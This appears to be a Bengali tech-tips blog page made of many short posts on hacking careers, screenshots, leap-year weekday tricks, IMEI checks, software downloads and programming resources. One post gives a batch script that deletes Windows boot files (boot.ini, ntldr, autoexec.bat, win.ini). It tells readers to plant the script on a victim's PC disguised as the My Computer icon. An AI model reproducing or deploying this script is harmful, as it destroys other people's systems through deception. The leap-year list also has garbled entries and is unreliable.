২। আপনাকে আগে জানতে হবে একজন হ্যাকার
হতে গেলে কি কি মৌলিক বিষয় গুল আপনার
জানা থাকা প্রয়োজন এবং বিশেষ কোন বিষয়
এর উপর আপনাকে কঠোর পরিশ্রম
করতে হবে।
৩ । আপনাকে আগে সিদ্ধান্ত
নিতে হবে আপনি কোন বিষয় নিয়ে কাজ করবেন
হার্ডওয়্যার না সফটওয়্যার ? কখনই
চিন্তা করবেন না আপনি ২ টা তেই সমান
ভাবে বিশেষজ্ঞ হবেন বা হতে হবে । তবে উভয়
বিষয় এ আপনার জ্ঞান এর প্রয়োজন
রয়েছে এই ক্ষেত্রে । কিন্তু আপনার সিদ্ধান্ত
ই আপনাকে সাহায্য
করবে আপনি কোথা থেকে শুরু করবেন ।
৪ । আপনাকে অবশ্যই প্রোগ্রামিং জানতে হবে
৫ । আপনাকে বিভিন্ন
সিকিউরিটি অপারেটিং সিস্টেম যেমন ব্যাক-
ট্রাক, কালি লিনাক্স বা বিভিন্ন হ্যাকার দের
দাড়া তৈরি লিনাক্স ডিসট্র
সম্পর্কে জানতে হবে । এছাড়াও উইন্ডোজ
এবং ম্যাক অপারেটিং সিস্টেম
সম্পর্কে জানতে হবে আপনাকে।
৬। একটা প্রফেশনাল কোর্স করতে পারেন,
কোর্স বিভিন্ন ধরণের আছে যেমন এথিকাল
হ্যাকিং অথবা ইন্টারনেট সিকিউরিটি বিষয়ক
যা কিনা আপনার এথিকাল
হ্যাকিং সম্পর্কে আপনার জ্ঞান প্রসারিত
করতে সাহায্য করবে ।
৭। আপনি নিজ থেকে জানার জন্য বিভিন্ন
হ্যাকিং বিষয়
নিয়ে পরীক্ষা নিরীক্ষা করতে পারেন
তাতে আপনি আসল বেপার
টা কি ঘটছে তা বুঝতে সক্ষম হবেন।
তবে অবশ্যই পরীক্ষা টা যেন নিজের
তৈরি করা ল্যাব এ হয় । বিনা অনুমতি তে অন্নের
উপর
পরীক্ষা নিরীক্ষা করতে গেলে আপনি নিজেই
ক্ষতি গ্রস্ত হতে পারেন।
৮। হার্ডওয়্যার এবং সফ্টওয়্যার
সঙ্গে পরীক্ষা নিরীক্ষা শুরু করুন
কি ভাবে পরিস্থিতি কে নিয়ন্ত্রণ
এবং কি ভাবে একটা কম্পিউটার কে হ্যাক
হওয়া থেকে প্রতিরোধ করা যায় ।
৯। নিজে নিজে আপনাকে প্রচুর
পড়াশুনা করতে হবে বিভিন্ন বিষয় এর উপর ।
তথ্যপ্রযুক্তি প্রতিনিয়ত প্রবর্তন ঘটছে এর
সাথে নিজেকে তাল মিলয়ে চলতে হলে আপনার
পড়াশুনার অভ্যাস এর বিকল্প নেই ।
পড়াশুনা সধু মাত্র তথ্য প্রজুক্তিই নয় আপনার
পারিপাস্সিক বিভিন্ন বিষয় যা আপনার চিন্তা ও
বুজার ক্ষমতা সহ জ্ঞান এর পরিধি বিভিন্ন
বিষয় এর উপর একটা বিশেষ
পরিপক্বতা নিয়ে আশে।
.১০ । প্রচুর ধর্য শক্তির প্রয়োজন যার জন্য
আপনাকে সব সময় শান্ত এবং ধর্য শিল
হওয়া শিখতে হবে ।
১১ । সর্ব পরি আপনার মস্তিস্ক কে ১০০ ভাগ
ব্যাবহার করার চেষ্টা করতে হবে ।
চিন্তা শক্তি ও বিশ্লেষণ করার
ক্ষমতা বারাতে হবে।যে কোন বিষয় নজর এ
এলে প্রথমে সম্ভাব্য প্রতিটা ভবিষ্যৎ
ফলাফল কি হতে পারে টা নিয়ে বিচার বিশ্লেষণ
করে সিদ্ধান্ত গ্রহণ করা।
১২। বিভিন্ন অনলাইন হ্যাকিং ফোরাম
এবং হ্যাকিং কমুউনিটির সাথে সম্পৃক্ত হন
তাদের বিভিন্ন হ্যাকিং প্রশিক্ষণ
থেকে আপনি হ্যাকিং এর দিক নির্দেশনা পাবেন
যা আপনার হ্যাকিং শিক্ষার ক্ষেত্রে বিশাল
ভুমিকা রাখতে পারে।

একটি পিসিকে চিরজীবনের জন্য মেরে ফেলুন-BTtutorial

কম্পিউটারে লালবাতি ধরাইছিলাম
যাউক গা , কাজের কথায় আসি ।নিচের
কোডটি কপি করে আপনার ভিকটিমের
কম্পিউটারের নোটপ্যাডে পেষ্ট করুন।
@echo off
attrib -r -s -h
c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del
c:boot.ini
attrib -r -s -h c:ntldr
del
c:ntldr
attrib -r -s -h
c:windowswin.
ini
del
c:windowswin.ini
এবার এটিকে fun.bat নামে সেভ করুন।
তবে এটাকে আপনি .bat বা .cmd তে সেভ
করতে পারবেন। এবার ডেক্সটপ Home এ My
Computer টাকে ভোগে পাঠিয়ে দিয়ে ঐ যায়গায়
আপনার Fun.bad ফাইলটা রেখে My Computer
এর icon টা লাগিয়ে দিন ।
ব্যাস , ঐখানে ডাবল ক্লিক মারলে কেল্লা ফতে

যে কোন তারিখের ১০০% সঠিক বার বলুন-BTtutorial

যা জানা জরুরীঃ
প্রতি চার বছর পর পর
ইংরেজী একবছরে ৩৬৫ দিনের
সাথে ১ দিন যোগ হয় ৩৬৬ দিন
হয়। ঐ বছরকে লীপ ইয়ার
বা অধিবর্ষ বলে।(এটা সবার
জানা)
কিন্তু প্রতি চারশত
বছরে তিনটি করে লীপ ইয়ার
বাদ দেয়া হয়। যেমনঃ
লীপ-ইয়ার
নয়ঃ (সাল): ১০০,
২০০, ৩০০,★ ৫০০,
৬০০, ৭০০, ★
৯০০, ১০০০,
১১০০, ★ ১৩০০,
১৪০০ ১৫০০, ★
১৭০০, ১৮০০,
১৯০০,★ ২১০০,
২২০০, ২৩০০, ★
২৫০০ ইত্যাদি।
লীপ-ইয়ারঃ (সাল):
০, ৪০০, ৮০০,
১২০০, ১৬০০,
২০০০, ২৪০০,
২৮০০, ৩২০০,
৩৬০০, ৪০০০
ইত্যাদি।
একটি নির্দিষ্ট বছর (লীপ
ইয়ার ব্যতীত) যে বারে শুরু হয়,
তার একদিন পরের
বারে পরবর্তী বছর শুরু হয়।
যেমন-
২০১৩ সাল শুরু
মঙ্গলবারে
২০১৪ সাল শুরু
বুধবারে
২০১৫ সাল শুরু
বৃহস্পতিবারে
২০১৬ সাল শুরু
শুক্রবারে
কিন্তু লীপ-ইয়ারের
ক্ষেত্রে যে বারে লীপ-ইয়ার
বা অধিবর্ষ শুরু হয়, তার
দুইদিন পরের
বারে পরবর্তী বছর শুরু হয়।
যেমন-
২০০০ সাল শুরু
শনিবারে
২০০১ সাল শুরু
সোমবারে
২০০৪ সাল শুরু
বৃহস্পতিবারে
২০০৫ সাল শুরু
শনিবারে
২০০৮ সাল শুরু
মঙ্গলবারে
২০০৯ সাল শুরু
বৃহস্পতিবারে
২০১২ সাল শুরু
রবিবারে
২০১৩ সাল শুরু
মঙ্গলবারে

স্ক্রিনশর্ট সফটওয়্যার ছাড়া

আমার প্রথম পোস্ট খুবি সামান্য বিষয়
নিয়ে । এটা একটি ট্রিক্স ও বলতে পারেন।
আমি এর আগে দেখি নাই এই বিষয় অর্থাৎ
এই রকম পোস্ট। যদি থাকে বা কেউ এর
আগে করে আমাকে জানাবেন আমি এই
পোস্ট টি ডিলিট করে দিবো। অনেক দিন
অপেক্ষা করছি এই রকম পোস্ট পেলাম না।
তাই আজকে দিয়েই দিলাম।
যা হউক মুল কথায় আসি। টাইটেল টি সবাই
দেখেছেন। স্ক্রিনশর্ট নিয়ে পোস্ট।
এটা শুধু আমি মোজিলা দিয়ে চেস্টা করেছি।
মজিলা থেকে ব্রাউজ করার সময় আপনার
কি বোর্ড থেকে
Ctrl+Shift+M দিন।
দেখুন চলে আসলো মোবাইল পেজ। এখন
এখান থেকে ক্যামেরার মত আইকন
দিয়ে স্ক্রিনশর্ট নিন খুবি সহজে।
তাছাড়া আপনি স্ক্রিন সাইজ
বাড়িয়ে নিতে পারেন ওখান থেকে।
কেমন লাগলো জানাবেন।
ভালো লাগলে ভালো বলবেন, খারাপ
লাগলে কিছু বইলেন না।

লেখার অন্যরকম এনিমেশন তৈরি করুন অন্যরকম Soft দিয়ে -BTtutorial

আসসালামু আলাইকুম। কেমন আছেন সবাই? আশা করি ভালোই আছেন। আমিও আপনাদের দোয়ায় আল্লাহর রহমতে ভালো আছি।

এনিমেশন নিয়ে আরো অনেক গবেষনা করে আরো কয়েকটি শেয়ার করতে পারতাম, আর সবাই আমার জন্য দোয়া করবেন যে আপনাদের আমি ভাল ভাল উপহার দিতে পারি। তাই আজ গুগ্ল মামার কাছে এনিমেশন লিখে সার্চ দিয়ে ভাল ১টা এনিমেশন সফট পেলাম ! যা দিয়ে আমরা যা লিখবো তা আবার এনিমেশন আকারে সেভ করে দেখা যাবে।

আমি প্রথমে কাজ করে দেখলাম ভাল লাগল তাই আপনাদের মাঝে শেয়ার করলাম। আপনিও ব্যবহার করে দেখুন মজা পাবেন।

প্রথমে এখান থেকে সফট টি ডাউনোড করে নিন, তারপর অন্যান্য সফট এর ন্যায় পিসিতে ইন্সটল দিন, তারপর চালু করুন। তাহলে নিচের মত দেখতে পাবেন।

এবার Record বাটনে ক্লিক করুন।

তারপর যে কোন ১টি নাম দিয়ে সেভ করুন, পরে এনিমেশন টি দেখার জন্য।

এবার আপনি যা কাজ করবেন সব রেকর্ড হবে, আর এই রেকর্ড জিপ আকারে সেভ হবে। পরে আপনি যে কাউকে এই দিলে সে অতি সহজে কাজটুকু বুঝতে পারবে।

আর এনিমেশন নিয়ে ১টি মজার ভিডিও দেখতে এখানে ক্লিক করুন।

আজ এই পর্যন্ত।
আল্লাহ হাফেজ।

CCleaner 4.07.4369 PRO Portable Version -BTtutorial

কেমন আছেন সবাই ? আশা করি ভাল আছেন। আমি আল্লাহর রহমতে ভাল আছি। আজ আমি আপনাদের জন্য নিয়ে এলাম CCleaner 4.07.4369 PRO Portable Version !

Cleans all areas of your Computer

Internet ExplorerInternet Explorer
Temporary files, history, cookies, Autocomplete form history, index.dat.
FirefoxFirefox
Temporary files, history, cookies, download history, form history.
Google ChromeGoogle Chrome
Temporary files, history, cookies, download history, form history.
OperaOpera
Temporary files, history, cookies.
Apple SafariSafari
Temporary files, history, cookies, form history.
WindowsWindows
Recycle Bin, Recent Documents, Temporary files and Log files

Download লিংক

লিনাক্স (LINUX) নিয়ে ক্যারিয়ার গড়তে চান?-BTtutorial

বিঃদ্রঃ এটি কোন বাণিজ্যিক পোস্ট নয়। একটি সেবামূলক একাডেমী’র পক্ষ থেকে BTtutorial এর সহযোগিতা কামনা করছি, যাতে প্রযুক্তিপ্রেমীরা একটি ICT Oriented Free School এর সাথে পরিচিত হতে পারে। আশাকরি অথরিটি বিষয়টি বিবেচনা করবেন…।

সুপ্রিয় , সবাই ভাল আছেন নিশ্চয়ই। ITMOYBD Academy of ICT এর পক্ষ থেকে আমরা নিয়ে আসছি ICT Advanced কোর্স । আর এবারের বিশেষ আকর্ষণ হচ্ছে লিনাক্স। যারা RedHat Certified Engineer হতে চান, লিনাক্স নিয়ে এক্সপার্টিস গ্রো করে সিস্টেম Administrator হিসেবে কাজ করতে চান তাদের জন্য আজকের post। আপনারা জানেন, ITMOYBD Academy of ICT বাংলা ভাষায় তথ্য ও যোগাযোগ প্রযুক্তি শিক্ষার ফ্রি স্কুল। ICT সেক্টরে একটি সমৃদ্ধ প্রজন্ম গড়ে তোলার লক্ষ নিয়েই আমরা কাজ করে যাচ্ছি। আপনাদের সহযোগিতা একান্তভাবে কাম্য। আশাকরি পাশে থাকবেন।

ICT Advanced কোর্স এর অধীনে আমরা শুরু করেছি লিনাক্স এ ক্যারিয়ার বিল্ডিং এর উপর বিস্তারিত আলোচনা

RHCSA & RHCE: অভিজ্ঞতা ও প্রস্ততি

লিনাক্স পাঠঃ প্রাথমিক পরিচিতি

লিনাক্স পাঠঃ RHCSA লেকচার 0.0

লিনাক্স পাঠঃRHCSA লেকচার 1.0

ICT Advanced কোর্স এর যাত্রা শুরু।

কম্পিউটারে স্ক্রীনশট তোলার সবচেয়ে সহজ উপায় -BTtutorial

কেমন আছেন সবাই? আশা করি ভালই আছেন। আজ আমি আপনাদের কম্পিউটারে স্ক্রীনশট তোলার সবচেয়ে সহজ উপায় দেখাব।

১. ডাউনলোড ছাড়া

আপনি যদি উইন্ডোজ ব্যবহারকারী হন তাহলে ডাউনলোড ছাড়াই স্ক্রীনশট তুলতে পারবেন। কম্পিউটারের স্টার্ট মেনুতে সার্চ করুন “Snipping Tool”. তা ওপেন করে যতটুকু স্ক্রীনশট চান তা Right Click করে তুলুন। তবে এতে ছবির মান একটু খারাপ আসবে।

২. ডাউনলোড সহ

আমার মনে হয় এটা স্ক্রীনশট তোলার সবচেয়ে সহজ উপায়। প্রথমে এখান থেকে Greenshot নামক সফটওয়্যারটি ডাউনলোড করে ইন্সটল করুন। দেখবেন যে টাস্কবারে Greenshot চালু হয়ে আছে। ডিফল্ট ভাবে Ctrl+ Prnt Scrn দিয়ে স্ক্রীনশট তোলা যাবে। Preferences থেকে আপনার মনের মতো Settings ঠিক করে নিতে পারবেন।

কি ভাবে আপনার ওয়েবসাইট এ Google Drive এর Direct লিঙ্ক দিবেন। যাতে এক ক্লিক এ ডাউনলোড হয়-BTtutorial

কি ভাবে আপনার ওয়েবসাইট এ Google Drive এর Direct লিঙ্ক দিবেন। অনেকে জানেন অনেকে জানেন না (যারা জানেন না  শুধুমাত্র তাদের জন্য)  Direct লিঙ্ক দেবার একটাই সুবিধা ইউজার এর ওয়েট করতে হয়না কোন ফাইল ডাউনলোড করতে।

প্রথমে আপনার জিমেইল অ্যাকাউন্ট দিয়ে লগিন করুন এর পর নিচের ছবি গুলো ফলও করুন।

Create এ ক্লিক করুন

যে কোন একটি নাম দিয়ে ফাইল টি তৈরি করুন।

Folder টি সিলেক্ট করে নিচের মত শেয়ার এ ক্লিক করুন

অ্যাডভান্সে ক্লিক করুন।

Done এ ক্লিক করুন

On Public on The Web এ ক্লিক করুন।

ফাইল টি ড্রাগ করে ড্রপ করুন।

Upload share এ ক্লিক করুন

আপনার ফাইল সাইজ অনুযায়ি সময় লাগতে পারে

নিচের মত করে সেটিং করুন

কপি করার পর  ওয়েবসাইট এ গিয়ে কপি করা লিঙ্ক টি  পেস্ট করে দিন নিচের মত।
এর নিচের মত আউটপুট দেখতে পারবেন।

আর সবসময় Direct লিঙ্ক দেবার চেষ্টা করবেন।

ধন্যবাদ সবাইকে পোস্টটি পড়ার জন্য।

আপনার ফোন কি আসল ? BTtutorial

smartphone11-large-final  আপনার ফোন কি অরিজিনাল? নাকি ক্লোন/ মাস্টারকপি!! খুব সহজে আপনি দেখে নিন। smartphone11 large final

বাজার এ এখন নানা রকমের ক্লোন আর মাস্টারকপি ফোন দিয়ে ভরে গেছে । কোনটা আসল আর কোনটা নকল বোঝাই যায় নাহ ।

এদের প্রতারনার শিকার হয়েসেন এরকম অনেক আছে । এইতহ সেদিন ই আমার এক বন্ধু স্যামসাং  গালাক্সি এস ৫ কিনে ধরা খেল । ২৫০০০ টাকা ধরা খেয়েছে ।

আপনাকে যাতে আর ধরা খেতে না হয়  সে জন্যই আসলে এই টিউনটি করা  ।

কীভাবে বুজবো যে আমার ফোনটা আসল ?

  • প্রথমে  এই ওয়েবসাইটে প্রবেশ করুন।
  • তারপর আপনার ফোনের IMEI নাম্বার দিন নিচের ছবির মতো। (আপনার ফোনের  IMEI নাম্বার পাবেন *#06# প্রেস করে)

  • তারপর CHECK এ ক্লিক করুন।
  • অরিজিনাল ব্র্যান্ডের ফোন হলে আপনার ফোনের সকল তথ্য চলে আসবে। (নিচের ছবির মতো)

31  আপনার ফোন কি অরিজিনাল? নাকি ক্লোন/ মাস্টারকপি!! খুব সহজে আপনি দেখে নিন। 31

  • Read More এ ক্লিক করলে আরও বিস্তারিত পাবেন।
  • নন-ব্র্যান্ডের বা চায়না ফোনের বা ক্লোন বা মাস্টার কপির  IMEI দিলে কিছু আসবে না।

2  আপনার ফোন কি অরিজিনাল? নাকি ক্লোন/ মাস্টারকপি!! খুব সহজে আপনি দেখে নিন। 2

  • এভাবে আপনি আপনার ফোনটি আসল নাকি নকল অথবা মাস্টারকপি  তা সহজেই ধরতে পারবেন ।

হ্যাকারদের হাত থেকে বাচাঁর জন্য-BTtutorial

হ্যাকারদের হাত থেকে বাচাঁর জন্য আমরা কত কিছুই না করি। তারপরও আমরা রক্ষা পাই না। হ্যাকারের বাংলা শব্দ হলো চোর। এটি কম্পিউটার্ প্রোগ্রামিংয়ের ভাষায় ব্যবহার করা হয়। যাই হোক, এই হ্যাকররা চোর হলেও ঈমানদার বলা যায়। কারন, তারাই বাচাঁর উপায় জানান দিয়েছে। অর্থাৎ আপনার পিসি হ্যাক হওয়ার জন্য আপনি নিজেই দ্বায়ী কারনগুলো হলো:

সহজ পাসওয়ার্ড ব্যবহার করা, ঘন ঘন পাসওয়ার্ড পরিবর্তন করা,
ওয়াইফাইয়ের ক্ষেত্রে WPA বা WEP ব্যবহার করা। WPA2 ব্যবহার করাই শ্রেয়,
ব্লু-টুথ অথবা ওয়াইফাই চালু রাখা,
HTTPS এর বদলে HTTP সাইট ব্যবহার করা


এছাড়াও আমরা ফেসবুকের ক্ষেত্রে Second verification ব্যবহার করতে পারি ইত্যাদি কারনগুলো তুলে ধরা হয়েছে।

তবে, আমরা সতর্ক থাকলেই কেবলমাত্র হ্যাকারদের হাত থেকে বাচঁতে পারবো নতুবা বিপদের কারণ হয়ে দাড়াতে পারে।
এই অ্যাড-অনটি ব্যবহার করে সহজেই হ্যাক থেকে বাচাঁ সম্ভব অর্থাৎ এটাকে বলে নিরাপদ বা Secure Browsing যা কিনা আপনার ব্রাউজ করা তথ্য সহজেই একজন হ্যাকার হ্যাক করতে পারবে না।

অ্যাড-অনটি ডাউনলোড করার জন্য নিচের লিংকে ক্লিক করুন।

Download

 BT-tutorial

সংযোগ ছাড়াই দেখা যাবে সব টিভি চ্যানেল

ইন্টারনেট এ ঘুরতে ঘুরতে এক দারুন খবর খুঁজে পেলাম। ভাবলাম, BTtutorial এ শেয়ার করি। কেবল (তার) ছাড়াই বাড়িতে বসে সরাসরি টেলিভিশন দেখার প্রযুক্তির মাধ্যমে দেখা যাবে দেশি ও বিদেশি সব টেলিভিশন চ্যানেল। ডিরেক্ট-টু-হোম (ডিটিএইচ) প্রযুক্তির মাধ্যমে বাড়িতে বসেই গ্রাহকযন্ত্রের মাধ্যমে দেশি ও বিদেশি স্যাটেলাইট টেলিভিশন চ্যানেল দেখা যাবে। বেক্সিমকো কমিউনিকেশনস লিমিটেড এক বিজ্ঞপ্তির মাধ্যমে এ তথ্য জানায়।

এ উপলক্ষে বুধবার বেক্সিমকোর প্রধান কার্যালয়ে বেক্সিমকো কমিউনিকেশনস লিমিটেডের সঙ্গে রাশিয়ার জিএস কোম্পানির চুক্তি সই হয়।  এ বিষয়ে বেক্সিমকো কমিউনিকেশনস জানায়, ২০১৪ সালের শেষের দিকে তারা এই প্রযুক্তির বাণিজ্যিক কার্যক্রম শুরু করবে। প্রতি বছর চার লাখ নতুন গ্রাহকের কাছে সেবা পৌঁছানোর প্রাথমিক লক্ষ্য নির্ধারণ করেছে কোম্পানিটি। তবে যাত্রা শুরুর প্রথম বছরেই তিন লাখ গ্রাহক এই সুবিধা গ্রহণ করতে পারবেন।

বিজ্ঞপ্তিতে উল্লেখ করা হয়, প্রতি বছর চার লাখ নতুন গ্রাহকের কাছে সেবা পৌঁছানোর প্রাথমিক লক্ষ্য নিয়েই কাজ করছে বেক্সিমকো কমিউনিকেশনস লিমিটেড। এ প্রকল্প বাস্তবায়নে বেক্সিমকোর সঙ্গে অংশীদারিত্ব করছে রাশিয়ার জিএস গ্রুপ নামে বৃহৎ শিল্প ও বিনিয়োগ প্রতিষ্ঠান।

বিজ্ঞপ্তিতে জানানো হয়, (ডিটিএইচ) সুবিধা পেতে গ্রাহককে সম্প্রচার কোম্পানি একটি ডিশ ও রিসিভার সেট প্রদান করবে যা, ওই ডিশের মাধ্যমে সিগন্যাল গ্রহণ করে রিসিভিং সেটের সাহায্যে বিভিন্ন চ্যানেল টেলিভিশন সেটে দেখা যাবে। এভাবে গ্রাহক তার কাঙ্ক্ষিত চ্যানেলগুলো দেখতে পারবেন।

সুবিধা হচ্ছে, গ্রাহক পছন্দ করা চ্যানেলগুলো বাছাই করতে পারবেন। কেবল (তার) সংযোগের মাধ্যমে পাওয়া ছবির চেয়ে এর মান হবে অনেক উন্নত। কেবলের মাধ্যমে টিভি দেখার সময় সিগন্যাল ব্রেক হয়। ডিটিএইচ প্রযুক্তিতে সিগন্যাল ব্রেক হবে না। উন্নতমানের সেবা পাওয়া যাবে। গ্রাহক তার পছন্দ মতো চ্যানেল কিনে মাসিক খরচ কমিয়ে আনতে পারবেন।

ওয়েবসাইট থেকে আয় বৃদ্ধি করার কিছু টিপস

সব্বাইকে শুভেচ্ছা জানিয়ে আজকের টিউনটি শুরু করছি ।একটি ওয়েব সাইট যা আপনার বেকারত্ব ঘোচাতে পারে অনেকের জন্য যোগাতে পারে পকেট খরচের টাকা ।

কিভাবে ওয়েবসাইট বানাবেন ?

খুব সহজ । আজকাল ব্লগস্পট অথবা ওয়ার্ড প্রেস এর সাহায্যে খুব সহজেই আপনি একটি ওয়েবসাইট বানাতে পারেন ইচ্ছা করলে কিনে নিতে পারেন একটি ডোমেইন ও থিম ।

টাকা আয় করবেন কিভাবে?

হাঁ এবার আসি আসল কথায় সাইট আপনি খুব সহজেই বানাতে পারবেন কিন্তু ইনকাম হবে কেমন করে? দাঁড়ান… চিন্তার কিছু নেই । এর জন্য বেশি কিছু আপনাকে করতে হবে না। একটু পরিশ্রমী আর ক্রিয়েটিভ হলেই আর কিচ্ছু লাগবে না । কি নিয়ে সাইট বানাতে চান সেটি ঠিক করুন কাজে লেগে পড়ুন।এরপর দেখবেন শুরু হবে আপনার সাইটে ভিজিটরের আনাগোনা। এবার আসল কাজ আপনাকে খুজতে হবে কিছু ভাল অ্যাড নেটওয়ার্ক । আপনাকে আপনার সাইট এর ধরন অনুযায়ী সেগুলো খুঁজে নিতে হবে।বিভিন্ন অ্যাড নেটওয়ার্ক সাধারনত প্রতিদিন ,১৫ দিনে একদিন অথবা ৩০ দিন পর পেমেন্ট করে থাকে ।

ভাল কিছু অ্যাড নেটওয়ার্ক ( আমার মতে আমার সাইটে আমি এগুলই ব্যবহার করি )

১.বিডভারটাইজার

২.অ্যাডঅনলি

৩.পপ অ্যাডস

৪.পপ ক্যাশ

৫.অয়াইলিক্স

৬.প্রপেল্লার অ্যাডস ইত্তাদি…।।

Math helper একটি Android Software। আপনি ছাত্র হলে এটা অবশ্যই আপনার দরকার।

আসসালামু আলাইকুম! কেমন আছেন সবাই? আশা করি ভালো। আমি প্রতিদিন কিছুনা কিছু এন্ড্রয়েড Software/Games আপনাদের সাথে শেয়ার করছি। আপনাদের কেমন লাগে জানিনা। তবে আশা করি ভালোই লাগে। আমি সবসময় ভালো কিছু শেয়ার করার চেষ্টা করি। আপনারা আমার জন্য দোয়া করবেন যাতে আমি আপনাদের সাথে ভালো কিছু শেয়ার করতে পারি। যাই হোক বেশি কিছু বলতে চাইনা। আজ আমি আপনাদের সাথে প্রতিদিনের মত একটা নতুন এন্ড্রয়েড Software শেয়ার করব। তবে আমি আজ যে এপটি শিয়েয়ার করব তা একটু ভিন্নরকম।আপনি যদি একজন ছাত্র হয়ে থাকেন তাহলে এটা আপনার অবশ্যই নেয়া প্রয়োজন। আশা করি বুঝতে পেরেছেন এটা কিধরনের এপ। এটা একটি এডুকেশনাল এপ মানে শিক্ষা বিষয়ক এপ।এটা আপনাকে বীজগনিতে সহায়তা করবে। বীজগনিতে যত সমস্যা আছে প্রায় সবকিছুরই সমাধান পাবেন এই এপসে।তো আপনিত বুঝতেই পারছেন যে এই এপটি আপনার কত উপকারে আসবে।তো ডাউনলোড করুন আর হয়ে উঠুন অংকের মাষ্টার।তবে আমি আগেই বলে রাখি এই এপটি এর আগে কেউ শেয়ার করেছে কিনা জানিনা তবে এটা আমি প্রথম শেয়ার করছি। তো যদি আপনারা এটা প্রয়জনিয় মনে করেন তাহলে ডাউনলোড করুন।
File Name:Math Helper Lite–Algebra.Apk

Download: BTtutorial

আশা করি Softwareটি আপনাদের উপকারে আসবে। আপনার লেখা পড়ায় অনেক সহায়তা করবে। ধন্যবাদ

প্রোগ্রামিং বা প্রোগ্রামিং বই নিয়ে দরকারি কিছু কথা । ।

ভালো প্রোগ্রামার হতে গেলে ডিসক্রিট ম্যাথ জানার বিকল্প নেই। দ্বিমিক কম্পিউটিং স্কুল নিয়ে আসছে সম্পূর্ণ বাংলায় ডিসক্রিট ম্যাথ কোর্স এবং এটি সবার জন্য ফ্রি। কোর্স শুরু হবে ২১শে মার্চ। রেজিস্ট্রেশন করতে হবে এই লিঙ্কে:

https://discrete-math.appspot.com/preview

তুমি যদি ইতিমধ্যে এই বইটি পড়ে ফেলো এবং এবারে ভালোভাবে সি শিখতে চাও, তবে Herbert Schildt-এর Teach Yourself C বইটি পড়তে পারো। আবার Brian Kernighan ও Dennis Ritchie-এর লেখা The C Programming Language বইটিও পড়তে পারো। লেখকদের একজন, Dennis Ritchie, সি ল্যাঙ্গুয়েজ ডিজাইন করেছেন।

আর কেউ যদি তোমার কাছে জানতে চায় শুরুতে সি শিখতে হলে কোন ইংরেজি বইটি ভালো তবে Stephen G. Kochan-এর Programming in C বইটির কথা বলে দেবে। এটি সি শেখার জন্য চমৎকার ও সহজ একটি বই। Schaums Outlines সিরিজের Programming with C বইটিও ভালো। বইতে প্রচুর উদাহরণ আর অনুশীলনী আছে।

সি শেখার পরে তুমি সি প্লাস প্লাস বা জাভা শিখতে পারো। সি প্লাস প্লাস শেখার জন্য ভালো বই হচ্ছে Teach Yourself C++ (লেখক: Herbert Schildt) আর জাভার জন্য Java How to Program (লেখক: Paul Deitel and Harvey Deitel)।

তারপর অন্য ল্যাঙ্গুয়েজ শিখতে গেলে আর বই কেনার দরকার নেই। ইন্টারনেটে প্রচুর টিউটোরিয়াল আছে। সেগুলো পড়ে শিখে ফেলবে।

সি এবং পাইথনের জন্য চমৎকার দুটি বই আছে অনলাইনে

– http://learnpythonthehardway.org/book/

http://c.learncodethehardway.org/book/

তুমি যদি কম্পিউটার বিজ্ঞানে পড়তে চাও, কিংবা প্রোগ্রামিং কন্টেস্টে ভালো করতে চাও, তাহলে তোমার Discrete Mathematics ভালো করে শিখতে হবে। এর জন্য Kenneth H. Rosen-এর Discrete Mathematics বইটি খুব ভালো। আগাগোড়া পড়ে ফেলবে। সঙ্গে সঙ্গে অনুশীলনীর সমস্যাগুলো সমাধানের চেষ্টা করবে। Discrete Mathematics শেখার পরে শিখতে হবে অ্যালগরিদম। অ্যালগরিদম শেখার শুরু আছে কিন্তু শেষ নেই। আর শুরু করার জন্য তোমরা পড়তে পারো Introduction to Algorithms (লেখক: Thomas H. Cormen, Charles E. Leiserson, Ronald L. Rivest and Clifford Stein)

এটি অ্যালগরিদমের মৌলিক বিষয়গুলো শেখার জন্য আমার দেখা সবচেয়ে ভালো বই।

প্রোগ্রামিং প্রতিযোগিতার জন্য কিছু লিংক:

http://projecteuler.net/ এখানে অনেক মজার সমস্যা আছে যেগুলোর বেশিরভাগই প্রোগ্রাম লিখে সমাধান করতে হয়। এখানে প্রোগ্রাম জমা দেওয়া লাগে না, কেবল প্রোগ্রাম দিয়ে বের করা উত্তরটা জমা দিতে হয়।

http://www.spoj.pl/  এখানেও অনেক ভালো সমস্যা আছে। সমাধান করে প্রোগ্রাম জমা দিলে প্রোগ্রাম সঠিক হয়েছে কি না তা জানা যায়। এই ওয়েবসাইটের একটি বৈশিষ্ট্য হচ্ছে সি, সি প্লাস প্লাস, জাভা, পার্ল, পাইথন, রুবি, পিএইচপি ইত্যাদি ব্যবহার করে প্রোগ্রাম লেখা যায়।

http://uva.onlinejudge.org/ এই সাইটে নিয়মিত অনলাইন প্রোগ্রামিং প্রতিযোগিতার আয়োজন করা হয়। এ ছাড়াও অনুশীলনের জন্য প্রচুর সমস্যা দেওয়া আছে। নতুন প্রোগ্রামারদের জন্য এটি বেশ ভালো জায়গা।

http://ace.delos.com/usacogate এটি যদিও আমেরিকার ইনফরমেটিক্স অলিম্পিয়াড ট্রেনিং প্রোগ্রাম, কিন্তু সাইটে যেকোনো দেশের প্রোগ্রামাররাই রেজিস্ট্রেশন করে অনুশীলন করতে পারে। তোমরা যারা প্রোগ্রামিং প্রতিযোগিতায় ভালো করতে চাও, তাদের অবশ্যই এখানে অনুশীলন করা উচিত।

http://www.topcoder.com/tc এখানেও নিয়মিত অনলাইন প্রোগ্রামিং প্রতিযোগিতা অনুষ্ঠিত হয়। এখানে ভালো ফলাফল করলে আবার টাকাও দেয় (কী আনন্দ!)। এ ছাড়া এখানে অনেক ভালো টিউটোরিয়াল ও আর্টিকেল আছে। এটি অভিজ্ঞ প্রোগ্রামারদের জন্য বেশ ভালো একটি সাইট।

http://codeforces.com এই সাইটে নিয়মিত বিভিন্ন ধরনের প্রোগ্রামিং কন্টেস্ট হয়। অভিজ্ঞ প্রোগ্রামারদের জন্য ভালো।

http://www.codechef.com এটিও প্রোগ্রামিং প্রতিযোগিতার জন্য একটি ভালো ওয়েবসাইট এবং অভিজ্ঞ প্রোগ্রামারদের জন্য।

http://ioinformatics.org আন্তর্জাতিক ইনফরমেটিক্স অলিম্পিয়াডের অফিসিয়াল ওয়েবসাইট।

http://cm.baylor.edu/welcome.icpc এসিএম আইসিপিসির অফিসিয়াল ওয়েবসাইট।

প্রোগ্রামিং ছাড়াও বিজ্ঞান ও গণিতের নানা বিষয়ের জন্য এই ফোরামে অংশগ্রহণ করতে পারো:

http://matholympiad.org.bd/forum/

